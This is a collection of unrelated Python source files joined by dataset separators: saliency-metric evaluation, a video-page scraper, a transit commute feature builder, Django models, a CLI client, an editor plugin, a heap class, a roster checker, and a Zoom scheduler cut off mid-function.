    Q = alpha * S_object(target, gt) + (1 - alpha) * S_region(target, gt)
    return Q
# ---- Evaluation configuration ----
gt_path = './testing/gt/'
target_path = './testing/output_u2net_results/'
test_datasets = ['DUTS']
output_dir = './plots/'
Num_th = 20        # number of thresholds for the PR/F curves
Threshold = 0.5    # binarisation threshold for the scalar metrics
Flag_figs = 0      # set to 1 to also sweep thresholds for PR/F curves

for dataset in test_datasets:
    name = 'exp' + '_' + dataset
    precision_list = np.zeros((Num_th, 1))
    recall_list = np.zeros((Num_th, 1))
    F_score = np.zeros((Num_th, 1))
    f1_score_list = []
    MAE_list = []
    Emeasure_list = []
    Bmeasure_list = []
    Smeasure_list = []
    count = 0
    print("----------------------------------------------------------------------------------------")
    img_name_list = list(glob.glob(gt_path + dataset + '/*' + '.jpg')) + list(glob.glob(gt_path + dataset + '/*' + '.png'))
    print("{} dataset starting, Total image : {} ".format(name, len(img_name_list)))
    for file in files(gt_path + dataset):
        gt_name = os.path.join(gt_path, dataset, file)
        target_name = os.path.join(target_path, dataset, file)
        Gt = cv2.imread(gt_name, 0)
        pred = cv2.imread(target_name, 0)
        h, w = Gt.shape
        # Resize the prediction to the ground-truth resolution.
        pred = cv2.resize(pred, (w, h))
        Gt = Gt.astype(np.float32)
        pred = pred.astype(np.float32)
        Bmeasure_list.append(B_measure(Gt, pred))
        # Binarise both maps at the fixed threshold.
        gt = np.zeros(Gt.shape)
        target = np.zeros(pred.shape)
        gt[Gt < Threshold] = 0
        gt[Gt >= Threshold] = 1
        target[pred < Threshold] = 0
        target[pred >= Threshold] = 1
        Emeasure_list.append(E_measure(gt, target))
        MAE_list.append(np.absolute(np.subtract(gt, target)).mean())
        Smeasure_list.append(S_measure(target, gt))
        # NOTE(review): 'labels' is probably meant to be average='binary';
        # kept as-is to preserve the current output — verify against sklearn.
        f1_score_list.append(f1_score(gt.reshape(h * w), target.reshape(h * w), labels='binary'))
        if Flag_figs == 1:
            # Threshold sweep for the precision-recall / F curves.
            t_count = 0
            for th in np.linspace(0.001, 0.99, Num_th):
                gt = np.zeros(Gt.shape)
                target = np.zeros(pred.shape)
                gt[Gt < th] = 0
                gt[Gt >= th] = 1
                target[pred < th] = 0
                target[pred >= th] = 1
                precision_list[t_count] += precision_score(gt.reshape(h * w), target.reshape(h * w))
                recall_list[t_count] += recall_score(gt.reshape(h * w), target.reshape(h * w))
                t_count += 1
        count += 1
        if count % 500 == 0:
            print(count)
    # Average the accumulated metrics over the dataset.
    precision_list = precision_list / count
    recall_list = recall_list / count
    F_score = F_score / count
    MAE = sum(MAE_list) / len(MAE_list)
    F_mu = sum(f1_score_list) / len(f1_score_list)
    E_mu = sum(Emeasure_list) / len(Emeasure_list)
    B_mu = sum(Bmeasure_list) / len(Bmeasure_list)
    S_mu = sum(Smeasure_list) / len(Smeasure_list)
    np.savez('%s/%s.npz' % (output_dir, name), precision_list=precision_list, recall_list=recall_list, F_score=F_score, MAE=MAE, F_mu=F_mu, E_mu=E_mu, B_mu=B_mu, S_mu=S_mu)
    print("Dataset:{} Mean F1_Score : {}".format(dataset, F_mu))
    print("Dataset:{} Mean MAE : {}".format(dataset, MAE))
    print("Dataset:{} Mean E_measure : {}".format(dataset, E_mu))
    print("Dataset:{} Mean B_measure : {}".format(dataset, B_mu))
    print("Dataset:{} Mean S_measure : {}".format(dataset, S_mu))
    print("{} dataset done".format(dataset))
    print("----------------------------------------------------------------------------------------")
    # Save the precision-recall and F-score curves for this dataset.
    plt.plot(recall_list, precision_list)
    plt.savefig(output_dir + name + '_' + 'Precision_recall.png')
    plt.clf()
    plt.plot(np.linspace(0, 255, Num_th), F_score)
    plt.savefig(output_dir + name + '_' + 'Fscore.png')
    plt.clf()
|
StarcoderdataPython
|
56963
|
import json
import re
import requests
from lxml import etree
def get(url: str) -> dict:
    """Scrape title, image URLs and video URLs from a Kuaishou share page.

    :param url: share URL (desktop live.kuaishou.com URLs are rewritten
        to the mobile photo endpoint)
    :return: dict possibly containing 'title', 'imgs', 'videos',
        'videoName'; ``{'msg': 'failed...'}`` when the request fails
    """
    data = {}
    headers = {
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25",
        "Cookie": "did=web_68e0268146694843a92700d2de49a0a6;"
    }
    # rewrite the desktop url to the mobile photo endpoint
    temp = re.findall(r'live\.kuaishou\.com/u/\w+/(\w+)', url)
    if temp:
        url = 'https://c.kuaishou.com/fw/photo/{}'.format(temp[0])
    rep = requests.get(url, headers=headers, timeout=10)
    if rep.status_code == 200:
        tree = etree.HTML(rep.text)  # pylint: disable=c-extension-no-member
        # title
        desc = tree.xpath(r"//meta[@name='description']/@content")
        if desc:
            data['title'] = desc[0]
        # imgs
        imgs = tree.xpath(r"//img[@class='play-long-image']/@src")
        if imgs:
            data['imgs'] = ["https:" + i for i in imgs]
        # videos: embedded JSON page data
        hide_data = tree.xpath(r"//div[@id='hide-pagedata']/@data-pagedata")
        if hide_data:
            try:
                data_ = json.loads(hide_data[0])
                data['videos'] = [data_['video']['srcNoMark']]
                data['title'] = data['videoName'] = data_['video']['caption']
            except Exception:
                # Malformed/unexpected page data: keep whatever was scraped.
                pass
        return data
    return {'msg': 'failed...'}
if __name__ == "__main__":
from pprint import pprint
pprint(get(input("url: ")))
|
StarcoderdataPython
|
1676052
|
from datetime import datetime
import pandas as pd
import googlemaps
def get_data_from_google_api(work, csv1_path):
    """
    Add public-transit commute features to Redfin property data using the
    Google Directions API and save the result to output/commute_data.csv.

    :param work: destination (work) address string
    :param csv1_path: path to the Redfin raw-data CSV
    """
    # Read in RedFin data
    prop_df = pd.read_csv(csv1_path)
    n = prop_df.shape[0]
    # Read the API key; 'with' closes the handle (the original leaked it).
    with open("delete/input.txt", "r") as key_file:
        API = key_file.read()
    gmaps = googlemaps.Client(key=API)  # Up to 40,000 calls per month
    now = datetime.now()
    aTime = now.replace(hour=8, minute=30)  # target arrival time: 8:30 AM
    # Add commute features for each property.
    for i in range(0, n):
        print("Percentage Complete: " + str(round((i + 1) / n * 100, 2)) + "%")
        home = prop_df['ADDRESS'][i] + " " + prop_df['CITY'][i]
        directions_result = gmaps.directions(
            home,
            work,
            mode="transit",
            arrival_time=aTime
        )
        if len(directions_result) != 0:
            # Number of transfers (steps).
            steps = len(directions_result[0]['legs'][0]['steps'])
            prop_df.at[i, 'COMMUTE_NUM_STEPS'] = steps
            # Total commute time to work, arriving at 8:30 AM.
            total_time = directions_result[0]['legs'][0]['duration']['text']
            prop_df.at[i, 'COMMUTE'] = total_time
            STEPS = []
            walk_time = 0
            for step in range(steps):
                _temp = directions_result[0]['legs'][0]['steps'][step]
                if _temp['travel_mode'] == "WALKING":
                    STEPS.append(str(_temp['travel_mode']).upper() + "(" + str(_temp['duration']['text']).upper() + ")")
                    walk_time += int(directions_result[0]['legs'][0]['steps'][step]['duration']['text'].split(" ")[0])
                elif _temp['travel_mode'] == "TRANSIT":
                    # Prefer "<vehicle type><line number>"; fall back to the
                    # line's full name when those fields are missing.
                    try:
                        _temp1 = _temp['transit_details']['line']['vehicle']['type']
                        _temp2 = _temp['transit_details']['line']['short_name']
                        _temp3 = str(_temp1) + str(_temp2)
                    except (KeyError, TypeError):  # was a bare 'except:'
                        _temp3 = _temp['transit_details']['line']['name']
                    STEPS.append(str(_temp3).upper() + "(" + str(_temp['duration']['text']) + ")")
            # Record all commute steps in one string plus total walking time.
            prop_df.at[i, 'COMMUTE_STEPS'] = ', '.join(STEPS)
            prop_df.at[i, 'WALKING_TIME'] = walk_time
    # Write the new cleaned dataset to directory
    output_file_path = "output/commute_data.csv"
    prop_df.to_csv(output_file_path, index=False)
if __name__ == '__main__':
    # Work Address
    work = "111 E Pearson St, Chicago, IL"
    # Redfin source data
    csv1_path = "data_sets/RedFin_raw_data.csv"
    get_data_from_google_api(work, csv1_path)
|
StarcoderdataPython
|
107384
|
# Dummy models.py file to allow for tests to run
from django.db import models
class CCTestModel(models.Model):
    """Dummy model that exists only so the test suite can run."""
    name = models.CharField(max_length=10)
    age = models.IntegerField()
    gender = models.CharField(max_length=10)
    price = models.PositiveIntegerField()
    discount = models.PositiveIntegerField()
    mfg_date = models.DateField()

    class Meta:
        # No constraints by default; tests are expected to supply their own.
        constraints = ()
|
StarcoderdataPython
|
3204370
|
from requests.models import Response
from uuid import UUID
class Experiment(object):
    """Placeholder for an experiment payload.

    TODO: fill in the non-optional members from the experiment-create schema.
    """

    def __init__(self):
        pass
def create_project(name: str) -> Response:
    """Create a project in the Vision API (stub — not yet implemented).

    Args:
        name (str): the name of the project to create
    """
    pass
def fetch_project(project_id: UUID) -> Response:
    """Fetch an existing project from the Vision API (stub — not yet implemented).

    Args:
        project_id (UUID): the id of the project to fetch
    """
    pass
def create_experiment_for_project(experiment: Experiment, project_id: UUID) -> Response:
    """Create an experiment for an existing project (stub — not yet implemented).

    Args:
        experiment (Experiment): the experiment json to use in the request body
        project_id (UUID): the id of the project to create this experiment in
    """
    pass
|
StarcoderdataPython
|
1611979
|
import logging
import json
from io import StringIO
from cliff.command import Command
from cliff.lister import Lister
from cliff.show import ShowOne
from prataiclient import utils
urllib3_logger = logging.getLogger('requests')
urllib3_logger.setLevel(logging.CRITICAL)
logging = logging.getLogger(__name__)
class FunctionShow(ShowOne):
    """Show information about a function"""

    def get_parser(self, prog_name):
        parser = super(FunctionShow, self).get_parser(prog_name)
        parser.add_argument(dest='function_id',
                            help='id of the function')
        return parser

    def take_action(self, parsed_args):
        function = self.app.client.functions.get(parsed_args.function_id)
        column = (
            'function_id',
            'user_id',
            'tenant_id',
            'name',
            'endpoint',
            'description',
            'type',
            'event',
            'runtime',
            'memory',
            'logs_endpoint'
        )
        # Derived logs endpoint; an empty base endpoint yields just '/logs'.
        log_endpoint = '{0}/logs'.format(function.get('endpoint', ''))
        data = (
            function.get('function_id', None),
            function.get('user_id', None),
            function.get('tenant_id', None),
            function.get('name', None),
            function.get('endpoint', None),
            function.get('description', None),
            function.get('type', None),
            function.get('event', None),
            function.get('runtime', None),
            function.get('memory', None),
            log_endpoint
        )
        return column, data
class FunctionCreate(Command):
    """Create a function from a file"""

    def get_parser(self, prog_name):
        parser = super(FunctionCreate, self).get_parser(prog_name)
        parser.add_argument(dest='name',
                            help='name of the function')
        parser.add_argument('--description',
                            dest='description',
                            default='',
                            help='Description of the function')
        parser.add_argument('--zip',
                            dest='zip',
                            required=True,
                            help='Path to zip file with the function '
                                 'and requirements are stored.')
        parser.add_argument('--memory',
                            dest='memory',
                            default=128,
                            help='How much memory this function will '
                                 'have available, default 128, '
                                 'min value = 64, max value = 8192')
        parser.add_argument('--type',
                            dest='type',
                            default='async',
                            choices=['async', 'wait_for_response'],
                            help='async will execute the function in the '
                                 'background, wait_for_response will block '
                                 'the execution until a response is given.')
        parser.add_argument('--runtime',
                            dest='runtime',
                            default='python27',
                            help='Define language runtime')
        parser.add_argument('--event',
                            dest='event',
                            default='webhook',
                            help='Define an event for the function to '
                                 'subscribe to')
        return parser

    def take_action(self, parsed_args):
        metadata = {}
        metadata['name'] = parsed_args.name
        metadata['description'] = parsed_args.description or ''
        metadata['event'] = parsed_args.event or 'webhook'
        metadata['runtime'] = parsed_args.runtime or 'python27'
        metadata['type'] = parsed_args.type or 'async'
        metadata['memory'] = parsed_args.memory or 128
        fd_meta = StringIO(json.dumps(metadata))
        # Open the archive in binary mode (zip files are not text) and make
        # sure the handle is closed after the upload; the original opened in
        # text mode and never closed the file.
        with open(parsed_args.zip, 'rb') as zip_fd:
            files = {
                "zip_file": zip_fd,
                "metadata": fd_meta
            }
            response = self.app.client.functions.create(files)
        logging.info(response)
class FunctionList(Lister):
    """List all functions"""

    def get_parser(self, prog_name):
        parser = super(FunctionList, self).get_parser(prog_name)
        parser.add_argument(
            '--only-id',
            dest='only_id',
            default=False,
            action='store_true',
            help='Display only the Ids',
        )
        return parser

    def take_action(self, parsed_args):
        functions = self.app.client.functions.list()
        if parsed_args.only_id:
            # Single-column output for scripting.
            return (('Function ID',),
                    ((function.get('function_id'),) for function in functions))
        else:
            return (('Function ID', 'Name', 'Endpoint', 'Description',
                     'Memory', 'Runtime'),
                    ((function.get('function_id'),
                      function.get('name'),
                      function.get('endpoint'),
                      function.get('description'),
                      function.get('memory'),
                      function.get('runtime'),
                      ) for function in functions))
class FunctionDelete(Command):
    """Delete a function"""

    def get_parser(self, prog_name):
        parser = super(FunctionDelete, self).get_parser(prog_name)
        parser.add_argument(dest='function_id',
                            help='id of the function')
        return parser

    def take_action(self, parsed_args):
        self.app.client.functions.delete(parsed_args.function_id)
class FunctionExecute(Command):
    """Execute a function"""

    def get_parser(self, prog_name):
        parser = super(FunctionExecute, self).get_parser(prog_name)
        parser.add_argument(dest='function_id',
                            help='id of the function')
        parser.add_argument('--file',
                            dest='file',
                            required=True,
                            help='Path to json file with the payload')
        return parser

    def take_action(self, parsed_args):
        # Load the JSON payload from disk and submit the execution request.
        payload = utils.doc_from_json_file(parsed_args.file)
        e = self.app.client.functions.execute(parsed_args.function_id, payload)
        logging.info(e)
class FunctionRunningList(Lister):
    """List running functions"""

    def get_parser(self, prog_name):
        parser = super(FunctionRunningList, self).get_parser(prog_name)
        parser.add_argument(
            '--only-id',
            dest='only_id',
            default=False,
            action='store_true',
            help='Display only the Ids',
        )
        return parser

    def take_action(self, parsed_args):
        functions = self.app.client.functions.running_list()
        # TODO(m3m0): Show request_id
        if parsed_args.only_id:
            return (('Run ID',),
                    ((function.get('run_id'),) for function in functions))
        else:
            # NOTE(review): the headers promise ('Run ID', 'Time running') but
            # the row tuples below reuse the fields from FunctionList
            # (endpoint, description, ...) — columns and data are misaligned.
            # Kept as-is; confirm the intended field names against the API
            # before fixing.
            return (('Function ID', 'Run ID', 'Name', 'Time running',
                     'Memory', 'Runtime'),
                    ((function.get('function_id'),
                      function.get('name'),
                      function.get('endpoint'),
                      function.get('description'),
                      function.get('memory'),
                      function.get('runtime'),
                      ) for function in functions))
|
StarcoderdataPython
|
4818713
|
# Generated by Django 2.2.4 on 2019-08-12 12:51
import uuid
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.4: creates the initial "Database" table.

    initial = True

    dependencies = []

    operations = [
        migrations.CreateModel(
            name="Database",
            fields=[
                ("created_date", models.DateTimeField(auto_now_add=True)),
                ("modified_date", models.DateTimeField(auto_now=True)),
                (
                    "id",
                    models.UUIDField(
                        default=uuid.uuid4,
                        editable=False,
                        primary_key=True,
                        serialize=False,
                    ),
                ),
                (
                    "memorable_name",
                    models.CharField(
                        help_text="Must match the set of environment variables starting with DATA_DB__[memorable_name]__",
                        max_length=128,
                        unique=True,
                        validators=[django.core.validators.RegexValidator(regex="[A-Za-z0-9_]")],
                    ),
                ),
                (
                    "is_public",
                    models.BooleanField(
                        default=False,
                        help_text=(
                            "If public, the same credentials for the database will be shared with each user. "
                            "If not public, each user must be explicilty given access, "
                            "and temporary credentials will be created for each."
                        ),
                    ),
                ),
            ],
            options={"db_table": "app_database"},
        )
    ]
|
StarcoderdataPython
|
169740
|
<filename>proj/manageapp/apps.py<gh_stars>0
import django.apps
class AppConfig(django.apps.AppConfig):
    """App configuration for proj.manageapp."""
    name = "proj.manageapp"
    # Fixed typo: was 'lavel', which Django silently ignores, so the
    # intended short app label was never applied.
    label = "manageapp"
|
StarcoderdataPython
|
53578
|
from django.shortcuts import render
from django.views.generic import CreateView
from django.urls import reverse_lazy
from dal import autocomplete
# from .models import Country, Person
# from .forms import PersonForm
from .models import Country
from .forms import CountryForm
# Create your views here.
# class PersonCreateView(CreateView):
# model = Person
# form_class = PersonForm
# template_name = 'person_form.html'
# view_name = 'create-person'
# success_url = reverse_lazy(view_name)
# Create your views here.
class CountryCreateView(CreateView):
    """Create-form view for Country; redirects back to itself on success."""
    model = Country
    form_class = CountryForm
    template_name = 'person_form.html'
    view_name = 'create-country'
    success_url = reverse_lazy(view_name)
class CountryAutocompleteView(autocomplete.Select2QuerySetView):
    """Select2 autocomplete endpoint for Country with free-text create support.

    Leftover debug print statements from the original were removed.
    """

    def get_queryset(self):
        qs = Country.objects.all()
        if self.q:
            # Case-insensitive substring match on the typed query.
            qs = qs.filter(name__icontains=self.q)
        return qs

    def get_create_option(self, context, q):
        """Form the correct create_option to append to results."""
        create_option = []
        display_create_option = False
        if self.create_field and q:
            page_obj = context.get('page_obj', None)
            # Only offer the create option on the first page of results.
            if page_obj is None or page_obj.number == 1:
                display_create_option = True
                # Don't offer to create a new option if a
                # (case-insensitive) identical one already exists.
                existing_options = (self.get_result_label(result).lower()
                                    for result in context['object_list'])
                if q.lower() in existing_options:
                    display_create_option = False
        if display_create_option and self.has_add_permission(self.request):
            create_option = [{
                'id': q,
                'text': ('"%(new_value)s"') % {'new_value': q},
                'create_id': True,
            }]
        return create_option

    def has_add_permission(self, request):
        # Anyone may create new options through the autocomplete.
        return True
|
StarcoderdataPython
|
1652126
|
<filename>format_apex_log.py
import sublime, sublime_plugin
class FormatApexLogCommand(sublime_plugin.TextCommand):
    """Sublime Text command that pretty-prints a Salesforce Apex debug log."""

    def run(self, edit):
        self.format(edit)
        self.foldAllTags()
        self.highlightDebugs()

    def format(self, edit):
        """Reformat the whole view, expanding USER_DEBUG/FATAL_ERROR lines."""
        # get all contents of view as a list of lines
        view = self.view
        wholeViewRegion = sublime.Region(0, view.size())
        lines = self.view.lines(wholeViewRegion)
        formattedString = ''
        for line in lines:
            contents = '\n' + view.substr(line) + '\n'
            if 'USER_DEBUG' in contents or 'FATAL_ERROR' in contents:
                formattedString += self.formatLine(contents)
            elif 'SYSTEM_MODE_' not in contents:
                # don't include System mode in formatted contents
                formattedString += contents
        # replace contents with the formatted contents
        view.replace(edit, wholeViewRegion, '\n' + formattedString)

    def formatLine(self, contents):
        """Indent the payload of a DEBUG/FATAL_ERROR line by bracket depth."""
        numTabs = 0
        tab = ' ' * 4
        formattedString = ''
        contentsSplit = contents.split('|DEBUG|')
        if len(contentsSplit) != 2:
            contentsSplit = contents.split('|FATAL_ERROR|')
        if len(contentsSplit) != 2:
            # Neither marker present: leave the line untouched.
            return contents
        formattedString += contentsSplit[0]
        contents = contentsSplit[1]
        skipNext = False
        for index, char in enumerate(contents):
            if skipNext:
                skipNext = False
                continue
            nextChar = None
            # BUG FIX: was 'if index < (index - 1):', which is always False,
            # so nextChar never got set and empty parens were never collapsed.
            if index < len(contents) - 1:
                nextChar = contents[index + 1]
            if char == '(' and nextChar == ')':
                # Keep empty parens on one line.
                formattedString += '()'
                skipNext = True
                continue
            if char in ['{', '}', ']', '[', '(', ')']:
                if char in ['}', ')', ']']:
                    numTabs -= 1
                formattedString += '\n' + (tab * numTabs) + char
                if char in ['{', '(', '[']:
                    numTabs += 1
                    formattedString += '\n' + (tab * numTabs)
            elif char == ',' and numTabs > 0:
                formattedString += ',\n' + (tab * numTabs)
            else:
                formattedString += char
        return formattedString

    def foldAllTags(self):
        self.foldTag('CUMULATIVE_LIMIT_USAGE', 'CUMULATIVE_LIMIT_USAGE_END')
        self.foldTag('SOQL_EXECUTE_BEGIN', 'SOQL_EXECUTE_END')
        self.foldTag('\|CODE_UNIT_STARTED\|\[EXTERNAL\]\|Validation', '\|CODE_UNIT_FINISHED\|Validation')
        self.foldTag('SELECT', 'FROM')

    def foldTag(self, startTag, endTag):
        # get all regions starting with the start tag
        regions = self.view.find_all('(?s)' + startTag + '.*?' + endTag)
        # for each region, fold the content between the tags
        for region in regions:
            regionBetweenTags = sublime.Region(
                region.begin() + len(startTag),
                region.end() - len(endTag))
            self.view.fold(regionBetweenTags)

    def highlightDebugs(self):
        regions = self.view.find_all('USER_DEBUG')
        self.view.add_regions("WordHighlight", regions, "comment", 'dot')
|
StarcoderdataPython
|
164027
|
<filename>apps/cc_cms/admin.py
from django_summernote.admin import SummernoteModelAdmin
from .models import Page, ColumnsSection, Content, DynamicText
class PageAdmin(SummernoteModelAdmin):
    """Admin class that renders every model field with the Summernote
    rich-text editor."""
    summernote_fields = '__all__'
def register_cms(admin_site):
    """Register every CMS model on *admin_site* with the Summernote admin."""
    for cms_model in (Page, ColumnsSection, Content, DynamicText):
        admin_site.register(cms_model, PageAdmin)
|
StarcoderdataPython
|
3376566
|
<filename>plot_dm.py
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append( './pkg' )
import pymod_dm
# Load solver outputs: time axis, density-matrix elements, and electric field.
time = np.loadtxt("res/time.dat")
data = np.loadtxt("res/dm_0.dat")
field = np.loadtxt("res/ef_0.dat")
t = np.loadtxt("res/time.dat")  # NOTE(review): duplicate of `time` above and unused below — confirm.
n_lvl = 3  # number of levels in the modeled system
idx = ['Rr1n1', 'Rr2n2']  # labels of the density-matrix elements to plot

# Map the raw data columns to named density-matrix elements.
dm = pymod_dm.assignDmElement( n_lvl, data )

fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
handle = []
# One curve per requested element; keep the line handles for the legend.
for i in idx:
    handle.append( ax.plot( time, dm[i], marker='.' )[0] )
# field_max = np.abs( np.amax( field[:,2] ) )
# ax.plot( time, field[:,2]/field_max-1.0, ".-")
plt.legend( handle, idx, shadow=True, loc='upper left' )
plt.xlabel('Time (fs)')
plt.ylabel('Density matrix element(s)')
plt.title('Evolution of density matrix')
#ax.set_xlim([-400,800])
ax.grid(True)
# Save the figure, then show it interactively.
plt.savefig("fig/dm.png")
plt.show()
|
StarcoderdataPython
|
1610606
|
<filename>example/task.py
from bixi.app import App
# Application instance this example registers its task on.
app = App(node_id='task')

@app.task
async def task_test():
    """Minimal example task: just prints that it ran."""
    print('task_test')
|
StarcoderdataPython
|
4830865
|
#!/usr/local/bin/python3
#
# roster-checker.py
# cs1570-grader
#
# Created by <NAME> on 05/14/17.
# Copyright 2017. <NAME>. All rights reserved.
#
import sys
import csv
import os
from pprint import pprint
def printError(error):
    """Print *error* to stderr and terminate the process with status 1.

    Fixed: the original permanently reassigned ``sys.stdout = sys.stderr``,
    redirecting all later stdout output as a side effect; writing directly
    to stderr via ``print(..., file=...)`` avoids that.
    """
    print(error, file=sys.stderr)
    sys.exit(1)
def parseRosterFile(filename):
    """Read a comma-separated roster file and return all cells as one flat list."""
    with open(filename, 'rt') as csvfile:
        return [cell
                for record in csv.reader(csvfile, delimiter=',')
                for cell in record]
def parseStudentFiles(filename):
    """Return the directory entries under *filename* (a directory path)."""
    return list(os.listdir(filename))
def stringIsSubstringInArray(string, array):
    """True if *string* and any element of *array* contain one another."""
    return any(string in element or element in string for element in array)
def removeOverlap(toRemove, toCheckAgainst):
    """Return the items of *toRemove* that overlap nothing in *toCheckAgainst*."""
    return [item for item in toRemove
            if not stringIsSubstringInArray(item, toCheckAgainst)]
def main():
    """Compare the class roster against the submissions directory and report
    both wrong submissions and missing ones."""
    # Require both the roster CSV path and the submissions directory path.
    if len(sys.argv) < 3:
        printError("usage: python3 stylechecker.py PATH/TO/ROSTER/FILE PATH/TO/STUDENTS/DIRECTORY/")
    rosterPath = sys.argv[1]
    roster = parseRosterFile(rosterPath)
    studentPath = sys.argv[2]
    students = parseStudentFiles(studentPath)
    # Roster names with no matching submission, and submissions with no
    # matching roster entry (matching is fuzzy: substring either way).
    rosterRemovedFromDirectory = removeOverlap(roster, students)
    diretoryRemovedFromRoster = removeOverlap(students, roster)
    if diretoryRemovedFromRoster:
        print("Wrong Submission")
        pprint(diretoryRemovedFromRoster)
    if rosterRemovedFromDirectory:
        print("Has Yet To Submit")
        pprint(rosterRemovedFromDirectory)

if __name__ == "__main__":
    main()
|
StarcoderdataPython
|
1642219
|
<filename>infercnvpy/_util.py
import numpy as np
# Determine the right tqdm version, see https://github.com/tqdm/tqdm/issues/1082
try:
import ipywidgets # type: ignore # NOQA
from tqdm.auto import tqdm
except ModuleNotFoundError:
from tqdm import tqdm # NOQA
def _ensure_array(a):
"""If a is a matrix, turn it into an array."""
if isinstance(a, np.matrix):
return a.A
else:
return a
|
StarcoderdataPython
|
1752683
|
# Interactive registry: collect name/sex/age records until the user stops,
# then report the total count, the average age, the women registered, and
# everyone older than the average.
pessoas = {}           # working record, cleared and reused for each person
geral = []             # all registered people (copies of `pessoas`)
sidade = media = 0     # running sum of ages / average age
while True:
    pessoas.clear()
    pessoas['nome'] = str(input('Nome: ')).strip().upper()
    # Re-prompt until the sex is exactly M or F.
    while True:
        pessoas['sexo'] = str(input('Sexo: [M/F] ')).strip().upper()[0]
        if pessoas['sexo'] in 'MF':
            break
        print('Digite apenas M ou F')
    pessoas['idade'] = int(input('Idade: '))
    sidade += pessoas['idade']
    # copy() is required: appending the dict itself would make every entry
    # alias the same object.
    geral.append(pessoas.copy())
    # Re-prompt until the answer is exactly S or N.
    while True:
        resp = str(input('Quer continuar? [S/N] ')).strip().upper()[0]
        if resp in 'SN':
            break
        print('Digite apenas S ou N')
    if resp == 'N':
        break
print('-=' * 30)
print(f'A) Foram cadastradas {len(geral)} pessoas')
media = sidade / len(geral)
print(f'B) A média de idade é {media} anos.')
print(f'C) As mulheres cadastradas foram: ', end='')
for p in geral:
    if p['sexo'] == 'F':
        print(f'{p["nome"]}...', end=' ')
print()
print(f'D) Pessoas acima da média: ', end='')
for p in geral:
    if p['idade'] > media:
        print(f'{p["nome"]} com {p["idade"]} anos...', end='')
|
StarcoderdataPython
|
4826316
|
from pyquil.parser import parse
from pyquil.api._qac import AbstractCompiler
from pyquil import Program
def parse_equals(quil_string, *instructions):
    """Assert that parsing *quil_string* yields exactly *instructions*."""
    expected = list(instructions)
    actual = parse(quil_string)
    assert expected == actual
class DummyCompiler(AbstractCompiler):
    """No-op compiler for tests: every stage passes the program through
    unchanged."""

    def get_version_info(self):
        """Return an empty version map (there is no real compiler behind this)."""
        return {}

    def quil_to_native_quil(self, program: Program, *, protoquil=None):
        """Identity 'compilation': return *program* unchanged."""
        return program

    def native_quil_to_executable(self, nq_program: Program):
        """Identity conversion: the program itself serves as the executable."""
        return nq_program
|
StarcoderdataPython
|
1777878
|
class Heap:
    """Array-backed binary max-heap.

    The tree is stored level-order in a list: the children of index ``i``
    live at ``2*i + 1`` and ``2*i + 2``, and its parent at ``(i - 1) // 2``.
    """

    def __init__(self, l):
        """Build a heap in-place over list *l* in O(n)."""
        self.tree = l
        self.heapify()

    def swap(self, idx1, idx2):
        """Exchange the elements at *idx1* and *idx2*."""
        self.tree[idx1], self.tree[idx2] = self.tree[idx2], self.tree[idx1]

    # O(n)
    def heapify(self):
        """Restore the heap property over the whole tree, bottom-up."""
        last_parent_index = (len(self.tree) - 2) // 2
        for i in range(last_parent_index, -1, -1):
            self.shift_down(i)

    # O(log(n))
    def shift_up(self, current_idx):
        """Bubble the element at *current_idx* up while it beats its parent."""
        if current_idx == 0:
            return
        # FIX: parent of i is (i - 1) // 2, not (i // 2) - 1. The old formula
        # produced wrong (even negative) parent indices, corrupting the heap
        # and recursing without bound on insert.
        parent_idx = (current_idx - 1) // 2
        # Strict comparison: equal elements do not need to move.
        if self.tree[current_idx] > self.tree[parent_idx]:
            self.swap(current_idx, parent_idx)
            self.shift_up(parent_idx)

    # O(log(n))
    def shift_down(self, current_idx):
        """Sink the element at *current_idx* below any larger child."""
        left_idx = 2 * current_idx + 1
        right_idx = 2 * current_idx + 2
        largest_idx = current_idx
        if left_idx < len(self.tree) and self.tree[left_idx] > self.tree[largest_idx]:
            largest_idx = left_idx
        if right_idx < len(self.tree) and self.tree[right_idx] > self.tree[largest_idx]:
            largest_idx = right_idx
        if largest_idx != current_idx:
            self.swap(current_idx, largest_idx)
            self.shift_down(largest_idx)

    # O(log(n))
    def insert(self, value):
        """Add *value* to the heap."""
        self.tree.append(value)
        self.shift_up(len(self.tree) - 1)

    # O(log(n))
    def pop(self) -> int:
        """Remove and return the maximum element.

        Raises:
            IndexError: if the heap is empty.
        """
        if not self.tree:
            raise IndexError("The heap is empty")
        value = self.tree[0]
        last = self.tree.pop()
        if self.tree:
            # Move the last leaf to the root and let it sink back down.
            self.tree[0] = last
            self.shift_down(0)
        return value

    def __iter__(self):
        return iter(self.tree)

    def __len__(self):
        return len(self.tree)
|
StarcoderdataPython
|
3221972
|
<reponame>kuan0020/quickzoom<gh_stars>0
from __future__ import print_function
from datetime import timedelta
import datetime
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from webdriver_manager.chrome import ChromeDriverManager
from selenium import webdriver
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
SCOPES = ['https://www.googleapis.com/auth/calendar.readonly']
def convert_time(hour, min):
    """Normalize an (hour, minute) pair, carrying minute over/underflow
    into the hour (e.g. (1, 70) -> (2, 10), (10, -20) -> (9, 40))."""
    total_minutes = hour * 60 + min
    return (total_minutes // 60, total_minutes % 60)
def day_time_splitter(fulltime):
    """Split a 'DDD.HH.MM' schedule string into ([weekday digits], hour, minute).

    The leading field is a run of single-digit weekday numbers; the hour and
    minute are normalized through convert_time.
    """
    parts = fulltime.split('.')
    days = [int(digit) for digit in parts[0]]
    hr, mn = convert_time(int(parts[1]), int(parts[2]))
    return (days, hr, mn)
def is_tenMin_range(fulltime):
    """Return True when today is one of *fulltime*'s scheduled weekdays and
    the current time is within +/-20 minutes of its class time.

    NOTE(review): despite the name, the threshold is 20 minutes, and the
    function returns None (not False) outside the window — confirm callers
    only rely on truthiness.
    """
    (day, hr, mn) = day_time_splitter(fulltime)
    # NOTE(review): classtime is computed but never used below.
    classtime = datetime.datetime.now().replace(hour=hr, minute=mn)
    thres = 20
    # Build the [before, after] window, using convert_time to carry minute
